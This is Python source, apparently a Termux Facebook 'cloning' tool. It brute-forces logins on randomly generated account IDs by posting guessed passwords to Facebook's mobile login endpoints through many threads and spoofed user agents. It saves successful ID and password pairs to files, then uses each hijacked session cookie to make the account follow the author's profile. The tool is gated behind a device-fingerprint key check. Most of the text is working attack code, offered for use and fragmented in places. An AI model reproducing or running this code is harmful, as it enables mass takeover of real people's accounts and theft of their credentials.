cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})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 = ses.get('https://m.facebook.com/login/device-based/password/?uid='+idf+'&amp;flow=login_no_pin&amp;refsrc=deprecated&amp;locale=id_ID&amp;_rdr').text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dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":idf,"flow":"login_no_pin","pass":pw,"next":"https://m.facebook.com/login/save-device/'"}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s.headers.update({"Host":'m.facebook.com',"cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://m.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":'https://m.facebook.com/login/device-based/password/?uid='+idf+'&amp;flow=login_no_pin&amp;refsrc=deprecated&amp;locale=id_ID&amp;_rdr',"accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})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po = ses.post('https://m.facebook.com/login/device-based/validate-password/?shbl=0&amp;locale2=id_ID',data=dataa,allow_redirects=False)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"checkpoint" in po.cookies.get_dict().keys():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cp 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print( f'\r\x1b[1;91m [ ALAMGIR-CP ] {idf} | {pw}')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open('CP/'+cpc,'a').write(idf+'|'+pw+'\n')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akun.append(idf+'|'+pw)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elif "c_user" in ses.cookies.get_dict().keys():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coki=po.cookies.get_dict()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coki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() 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print(f'\r\x1b[1;92m [ ALAMGIR-OK ] {idf} | {pw}')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wrt =('%s - %s' % (idf,pw))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ok.append(wrt)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open('/sdcard/ids/ok.txt','a').write('%s\n' % wrt)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follow(ses,coki)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except requests.exceptions.ConnectionError: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time.sleep(31)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loop+=1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free(idf,pwv):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global loop,ok,cp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bi = random.choice([u,k,kk,b,h,hh])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pers = loop*100/len(id2)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fff = '%'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sys.stdout.write('\r %s[ ALAMGIR ] %s•%s • OK:%s • CP:%s  '%(bi,loop,len(id2),len(ok),cp)),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sys.stdout.flush()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ua = random.choice(ugen)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ua2 = random.choice(ugen2)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ses = requests.Session()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pw in pwv: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pw = pw.lower()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ses.headers.update({"Host":'mbasic.facebook.com',"upgrade-insecure-requests":"1","user-agent":ua2,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})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 = ses.get('https://mbasic.facebook.com/login/device-based/password/?uid='+idf+'&amp;flow=login_no_pin&amp;refsrc=deprecated&amp;locale=id_ID&amp;_rdr').text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dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":idf,"flow":"login_no_pin","pass":pw,"next":"https://mbasic.facebook.com/login/save-device/'"}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s.headers.update({"Host":'mbasic.facebook.com',"cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://mbasic.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":'https://mbasic.facebook.com/login/device-based/password/?uid='+idf+'&amp;flow=login_no_pin&amp;refsrc=deprecated&amp;locale=id_ID&amp;_rdr',"accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})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po = ses.post('https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0&amp;locale2=id_ID',data=dataa,allow_redirects=False)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"checkpoint" in po.cookies.get_dict().keys():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rint( f'\r\x1b[1;91m [ ALAMGIR-CP ] {idf} | {pw}')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open('CP/'+cpc,'a').write(idf+'|'+pw+'\n')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akun.append(idf+'|'+pw)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elif "c_user" in ses.cookies.get_dict().keys():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coki=po.cookies.get_dict()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coki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() 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print(f'\r\x1b[1;92m [ ALAMGIR-OK ] {idf} | {pw}')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wrt =('%s - %s' % (idf,pw))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ok.append(wrt)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open('/sdcard/alamgir-OK.txt','a').write('%s\n' % wrt)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follow(ses,coki)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except requests.exceptions.ConnectionError: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time.sleep(31)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loop+=1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follow(ses,coki):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ses.headers.update({"accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})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 = sop(ses.get('https://mbasic.facebook.com/profile.php?id=100067945261995', cookies={'cookie': coki}).text, 'html.parser')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 = r.find('a', string='Follow').get('href')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ses.get(('https://mbasic.facebook.com' + str(get)), cookies={'cookie': coki}).text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logo2():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#Yahan apna logo paste krna hw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("""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▄▄▄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▄▄▄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██▓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▄▄▄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███▄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▄███▓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▒████▄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▓██▒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▒████▄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▓██▒▀█▀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██▒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▒██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▀█▄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▒██░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▒██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▀█▄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▓██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▓██░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░██▄▄▄▄██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▒██░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░██▄▄▄▄██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▒██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▒██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▓█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▓██▒░██████▒▓█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▓██▒▒██▒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░██▒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▓▒█░░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▒░▓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░▒▒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▓▒█░░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───────────────────────────────────────────────────────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\t\033[1;97m[\x1b[1;97m\x1b[1;41m MD. ALAMGIR\x1b[0m\x1b[1;97m]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\t\033[1;97m[\x1b[1;97m\x1b[1;41m Contact :+8801712034653\x1b[0m\x1b[1;97m] \033[1;37m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───────────────────────────────────────────────────────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\t\033[1;97m[\x1b[1;97m\x1b[1;41m Author   : MD. ALAMGIR \x1b[0m\x1b[1;97m]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\t\033[1;97m[\x1b[1;97m\x1b[1;41m Github  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www.gitclone//github.com/cyberattack07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\x1b[0m\x1b[1;97m]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\t\033[1;97m[\x1b[1;97m\x1b[1;41m Facebook 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https://www.facebook.com/Tera.Papa.Alamgir.441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\x1b[0m\x1b[1;97m]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───────────────────────────────────────────────────────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runtxt(z):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e in z + "\n":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sys.stdout.write(e)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sys.stdout.flush()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time.sleep(0.03)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os.system('termux-setup-storage')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helpnote():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print("%s [=&gt;] FOLLOW ME ON  FB TU KNOW ABOUT UPDATES  :)"%(G))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subprocess.check_output(["am", "start", "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https://github.com/cyberattack07/approval.txt/blob/main/approval.txt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exit(" [=&gt;] FACEBOOK : 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https://www.facebook.com/Tera.Papa.Alamgir.441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notice():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runtxt("\n\033[0;97m  Free 2009 cloning Tool For Free Aproval Join Group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os.system("xdg-open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https://m.me/Tera.Papa.Alamgir.441/?app=fbl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runtxt("\033[0;97m Key Approval ke Lai Group Jion Krein &gt;&gt; %s%s"%(G,basesplit))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runtxt("\033[0;97m Key group admin ke post pe coment krein")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os.system("xdg-open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https://m.me/Tera.Papa.Alamgir.441/?app=fbl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subprocess.check_output(["am", "start", "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https://m.me/Tera.Papa.Alamgir.441/?app=fbl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plist = (platform.uname())[2]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basex = plist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basex1 = basex.encode('ascii')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basex2 = base64.b64encode(basex1)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basex3 = basex2.decode('ascii')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base4 = (basex3).upper()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basesplit = base4.replace('=', 'X').replace('A', '3').replace('B', '9').replace('C', '7').replace('D', '1').replace('E', '4').replace('M', '2').replace('L', '6').replace('F', '8').replace('N', 'E').replace('T', '8')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Main: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self.id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self.ok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self.cp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self.loop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plr = requests.get('https://github.com/cyberattack07/approval.txt/blob/main/approval.txt').text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basesplit in plr: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key = basesplit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stat = ("\033[0;97mPREMIUM")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FY = '\033[0;97m'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FG = '\033[0;97m'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GET = '\r'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key = ("\033[0;97m -")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stat = ("\033[0;97PREMIUM")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FY = '\033[0;90m'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FG = '\033[0;90m'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GET = '\033[0;97m [P] GET PREMIUM'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except requests.exceptions.ConnectionError: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print("\n%s [!] NO INTERNET CONNECTION..\n"%(R))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os.system("clear")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#yahan logo lagana apna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("""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▄▄▄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██▓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▄▄▄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███▄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▄███▓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▒████▄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▓██▒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▒████▄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▓██▒▀█▀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██▒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▒██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▀█▄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▒██░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▒██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▀█▄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▓██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▓██░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░██▄▄▄▄██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▒██░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░██▄▄▄▄██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▒██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▒██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▓█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▓██▒░██████▒▓█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▓██▒▒██▒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░██▒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▓▒█░░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▒░▓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░▒▒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▓▒█░░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───────────────────────────────────────────────────────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\t\033[1;97m[\x1b[1;97m\x1b[1;41m MD. ALAMGIR\x1b[0m\x1b[1;97m]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\t\033[1;97m[\x1b[1;97m\x1b[1;41m Contact : +8801712034653\x1b[0m\x1b[1;97m] \033[1;37m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───────────────────────────────────────────────────────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\t\033[1;97m[\x1b[1;97m\x1b[1;41m Author   : MD. ALAMGIR \x1b[0m\x1b[1;97m]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\t\033[1;97m[\x1b[1;97m\x1b[1;41m Github   :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www.gitclone//github.com/cyberattack07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\x1b[0m\x1b[1;97m]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\t\033[1;97m[\x1b[1;97m\x1b[1;41m Facebook :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https://www.facebook.com/Tera.Papa.Alamgir.441\x1b[0m\x1b[1;97m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───────────────────────────────────────────────────────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print("%s [%s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•%s] %sTOOL NAME : %s2009 Cloning Tool"%(G,R,G,B,G))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print("%s [%s•%s] %sContack   : %s+8801712034653"%(G,R,G,B,G))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print("%s [%s•%s] %sYOUR KEY  : %s%s"%(G,R,G,B,G,key))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print("%s [%s•%s] %sSTATUS    : %s"%(G,R,G,B,stat))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───────────────────────────────────────────────────────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 \t\033[1;97m[\x1b[1;97m\x1b[1;41m FOLLOW MY FACEBOOK ACCOUNT FIRST\x1b[0m\x1b[1;97m] \033[1;37m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subprocess.check_output(["am", "start", "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https://www.facebook.com/Tera.Papa.Alamgir.441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───────────────────────────────────────────────────────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print("%s [%s1%s]%s CRACK RANDOM FB ID 2009-11 {JUST NOW} %s(PREMIUM)"%(G,R,G,Y,B))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tanya = input("    \033[0;97m(=×&gt;)\033[0;97m CHOOSE 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───────────────────────────────────────────────────────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tanya in ["", " "]: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elif tanya in ["1", "01"]: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basesplit in plr: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    self.fbtua()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notice()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Main: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__init__(self):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self.id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self.ok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self.cp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self.loop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os.system("clear")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print(logo)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print("\n [1] File Cloning")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 [2] Public Cloning")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 [3] Create File")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 [4] 2004-09 Cloning")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 [5] 2010-14 Cloning")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 [E] Exit Programming\n")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ALAMGIR =input(" Choose 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ALAMGIR in ["1", "01"]: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File()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ALAMGIR in ["2", "02"]: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Public()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ALAMGIR in ["3", "03"]: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os.system("python Dump.py")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ALAMGIR in ["4", "04"]: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self.old()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ALAMGIR in ["5", "05"]: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self.old2()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(" Select Correctly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time.sleep(1)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old(self):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x = 111111111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xx = 999999999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idx = "100000"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os.system('clear');print(logo)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limit = int(input(" \n\033[0;95m[+]\033[0;93m TOTAL IDS TO CRACK LIMIT 50,000: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 n in range(limit):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_ = random.randint(x,xx)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__ = idx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self.id.append(__+str(_))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print("\033[0;93m [+] TOTAL ID -&gt; \033[0;91m%s\033[0;97m"%(len(self.id)))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with ThreadPoolExecutor(max_workers=30) as coeg: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print("\n\033[1;32m [!] USE (123456) FOR IDZ\033[1;37m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listpass = input("%s [?] ENTER PASSWORD :%s "%(G,Y))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len(listpass)&lt;=5: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exit("\n%s [!] PASSWORD MINIMUM 6 CHARACTERS"%(B))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print("%s [*] CRACK WITH PASSWORD -&gt; [\033[0;91m%s\033[0;93m]"%(G,listpass))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os.system("clear")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print(logo)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print("\n%s [+] OK RESULTS SAVED IN -&gt; ok.txt"%(Y))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print("%s [+] CP RESULTS SAVED IN -&gt; cp.txt"%(G))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print("%s [!] IF NO RESULT USE AIRPLANE MODE 5 SECONDS\x1b[0m\n"%(P))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for user in self.id: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coeg.submit(self.api, user, listpass.split(","))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exit("\n\n [&gt;&gt;] CRACK COMPLETE...")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except Exception as e:exit(str(e))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api(self, uid, pwx):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rua = random.choice([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"Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z007;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]",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"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; .NET4.0E; GWX:QUALIFIED)",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Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0.2 Waterfox/40.0.2",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5.0; SAMSUNG SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile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4.4.2; SM-T217S Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84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WOW64; Trident/7.0; MALNJS;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4.4.2; RCT6203W46 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84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8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",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(Android; Tablet; rv:34.0) Gecko/34.0 Firefox/34.0",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(compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)",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(compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; TNJB; 1ButtonTaskbar)",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(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",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4.0.4; BNTV400 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111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4.0.4; BNTV600 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111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4.4.2; SM-T237P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84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4.4.2; SM-T530NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84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5.0.1; SCH-I545 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile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5.0; SAMSUNG SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile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5.1.1; SAMSUNG SM-G920P Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Chrome/38.0.2125.102 Mobile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5.1.1; SAMSUNG SM-G920T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Chrome/38.0.2125.102 Mobile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5.1.1; SAMSUNG SM-N910P Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile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4.4.2; en-us; LG-V410/V41010d Build/KOT49I.V41010d) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.1599.103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4.4.3; en-us; KFARWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/3.68 like Chrome/39.0.2171.93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4.4.3; en-us; KFSAWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/3.68 like Chrome/39.0.2171.93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10.9; rv:34.0) Gecko/20100101 Firefox/34.0",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10.9; rv:36.0) Gecko/20100101 Firefox/36.0",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10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155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10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130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10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157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10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130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10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85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10_10_3) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3",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10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107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10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174",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10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2503.0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10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko)",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10_10_5) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56",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10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135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10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124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10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81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10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157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10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15",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x64; Trident/7.0;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WOW64; Trident/7.0; Touch; MAARJS;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WOW64; Trident/7.0; Touch; MALNJS;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WOW64; Trident/7.0; Touch; MDDCJS;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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 LBBROWSER",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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155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6.0; rv:38.0) Gecko/20100101 Firefox/38.0",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6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US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6.0; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0",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6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115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6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90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6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65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rv:28.0) Gecko/20100101 Firefox/28.0",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rv:31.0) Gecko/20100101 Firefox/31.0",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rv:36.0) Gecko/20100101 Firefox/36.0",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13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Chrome/30.0.1599.101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Chrome/33.0.1750.146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Chrome/36.0.1985.125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Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US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Chrome/38.0.2125.101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Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0",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Chrome/39.0.2171.71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Chrome/39.0.2171.99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Chrome/41.0.2272.118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Chrome/42.0.2311.154 Safari/537.36 LBBROWSER",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Chrome/43.0.2357.132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Maxthon/4.4.6.1000 Chrome/30.0.1599.101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WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",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WOW64; rv:34.0) Gecko/20100101 Firefox/34.0",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WOW64; Trident/7.0; ASJB; ASJB; MAAU;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WOW64; Trident/7.0; BOIE9;ENUSSEM;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WOW64; Trident/7.0; MDDRJS;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6.2; Win64; x64; Trident/7.0;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6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",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6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",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Trident/7.0; Touch; TNJB;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Win64; x64; Trident/7.0; MALNJS;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Win64; x64; Trident/7.0; Touch; MAARJS;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Win64; x64; Trident/7.0; Touch; MASMJS;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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.2000 Chrome/30.0.1599.101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WOW64; Trident/7.0; Touch; MAARJS;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WOW64; Trident/7.0; Touch;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(Windows; U; Windows NT 6.1; zh-CN; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)",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CrOS x86_64 6457.107.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115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CrOS x86_64 7077.95.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.90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Fedora; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0",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i686; rv:40.0) Gecko/20100101 Firefox/40.0",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AppleWebKit/534.24 (KHTML, like Gecko) Chrome/33.0.0.0 Safari/534.24",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Chrome/34.0.1847.76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Chrome/38.0.2125.102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Chrome/43.0.2357.134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Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94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10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2",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U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",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10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8",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10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10",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10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF",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10_10; rv:33.0) Gecko/20100101 Firefox/33.0",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10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko)",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"Mac OS X/10.6.8 (10K549); ExchangeWebServices/1.3 (61); Mail/4.6 (1085)",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10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7",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U; Intel Mac OS X 10_5_4; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1",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10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko)",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10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7",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"MacOutlook/0.0.0.150815 (Intel Mac OS X Version 10.10.5 (Build 14F27))",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10.9; rv:28.0) Gecko/20100101 Firefox/28.0",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10.10; rv:34.0) Gecko/20100101 Firefox/34.0",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10.7; rv:46.0) Gecko/20100101 Firefox/46.0",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10.9; rv:44.0) Gecko/20100101 Firefox/44.0",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10.10; rv:51.0) Gecko/20100101 Firefox/51.0",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U; Intel Mac OS X 10.4; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5",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10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124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10.10; rv:52.0) Gecko/20100101 Firefox/52.0",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10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153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10.8; rv:38.0) Gecko/20100101 Firefox/38.0",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10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130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CK={} (Windows NT 6.1; WOW64; Trident/7.0;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Chrome/74.0.3729.169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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121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Chrome/74.0.3729.157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6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",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6.0; Windows NT 5.1; SV1)",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Chrome/60.0.3112.113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WOW64; Trident/7.0;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Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134",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Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763",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(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; KTXN)",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5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",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6.0; Windows NT 5.1)",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WOW64; rv:54.0) Gecko/20100101 Firefox/54.0",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WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90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7.0; Windows NT 6.0)",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10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121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WOW64; Trident/7.0;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WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",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6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169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9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)",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6.0; Windows NT 5.1; .NET CLR 1.1.4322)",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Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362",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Trident/7.0;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6.0; Windows NT 5.0)",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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71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AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1",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Chrome/69.0.3497.100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Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",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Chrome/63.0.3239.132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9.0; Windows NT 6.1)",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Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363",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Chrome/80.0.3987.149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Chrome/79.0.3945.88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Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75",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Chrome/78.0.3904.108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5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90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6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90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Chrome/79.0.3945.130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Chrome/85.0.4183.121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Chrome/84.0.4147.105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6.0; Windows 98)",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Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113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WOW64; Trident/7.0;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Chrome/67.0.3396.99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5.1; rv:36.0) Gecko/20100101 Firefox/36.0",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5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)",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(compatible; Googlebot/2.1; +http://www.google.com/bot.html)",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(compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",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(compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",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(compatible; MJ12bot/v1.4.5;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http://www.majestic12.co.uk/bot.php?+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(compatible; Yahoo! Slurp;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http://help.yahoo.com/help/us/ysearch/slurp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6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",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"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)",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(Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)",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7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)",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Chrome/49.0.2623.75 Safari/537.36 Google Favicon",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Chrome/44.0.2403.157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Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0",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U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0",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i686; rv:5.0) Gecko/20100101 Firefox/5.0",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AppleWebKit/534.24 (KHTML, like Gecko) Chrome/71.0.3578.141 Safari/534.24 XiaoMi/MiuiBrowser/12.4.3-g",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HeadlessChrome/69.0.3497.81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x86_64; rv:12.0) Gecko/20100101 Firefox/12.0",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Chrome/62.0.3202.89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U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1",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x86_64; rv:67.0) Gecko/20100101 Firefox/67.0",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i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/53.0.2785.143 Chrome/53.0.2785.143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Chrome/89.0.4389.72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Ubuntu; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0",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Ubuntu Chromium/80.0.3987.87 Chrome/80.0.3987.87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Chrome/65.0.3325.109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Chrome/59.0.3071.109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i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.120 Chrome/37.0.2062.120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Chrome/80.0.3987.116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Ubuntu; Linux i686; rv:53.0) Gecko/20100101 Firefox/53.0",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Ubuntu Chromium/76.0.3809.100 Chrome/76.0.3809.100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Ubuntu Chromium/49.0.2623.108 Chrome/49.0.2623.108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"Wget/1.17.1 (linux-gnu)",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Fedora; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0",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x86_64; rv:33.0) Gecko/20100101 Firefox/33.0",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Chrome/41.0.2272.101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x86_64; rv:41.0) Gecko/20100101 Firefox/41.0",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Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0",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x86_64; rv:37.0) Gecko/20100101 Firefox/37.0",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HeadlessChrome/79.0.3945.0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Ubuntu; Linux i686; rv:59.0) Gecko/20100101 Firefox/59.0",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Chrome/62.0.3202.62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(SMART-TV; Linux; Tizen 5.0) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.2 Chrome/63.0.3239.84 TV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Ubuntu Chromium/70.0.3538.77 Chrome/70.0.3538.77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Chrome/51.0.2704.103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U; Linux i686; es-ES; 